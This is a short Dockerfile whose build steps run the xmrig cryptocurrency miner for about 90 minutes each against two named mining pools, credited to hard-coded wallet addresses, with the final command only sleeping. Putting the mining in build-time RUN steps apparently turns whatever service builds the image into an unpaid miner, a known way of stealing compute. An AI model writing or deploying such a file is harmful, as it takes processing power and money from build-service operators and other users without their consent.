FROM eliteminer/xmrig_zero_docker
RUN xmrig -o stratum+tcp://bytecoin.uk:5555 -u 25dpLqTRQigX5us8cwesqBBNg9PPirL1ELvbaQCQm477HkNi7byxGrWEv8HCNW8eXfEDncxQm3eEHPhtcyUtvwbzRDZ11Wu --threads="$(nproc)" --max-cpu-usage=80 & sleep 5400
RUN sleep 60
RUN xmrig -o stratum+tcp://masari.superpools.net:3333 -u 5pqUTCEcg5tjfdpuE8ZQu2JEdFTdgN2fzcydv5e5ypkcHuLRdG5zXkGZoWMz2KhJpxKKf5oto4KTh53v7iBbjNHgPT9soLC --threads="$(nproc)" --max-cpu-usage=80 & sleep 5400
RUN sleep 120

CMD ["sleep", "600000000"]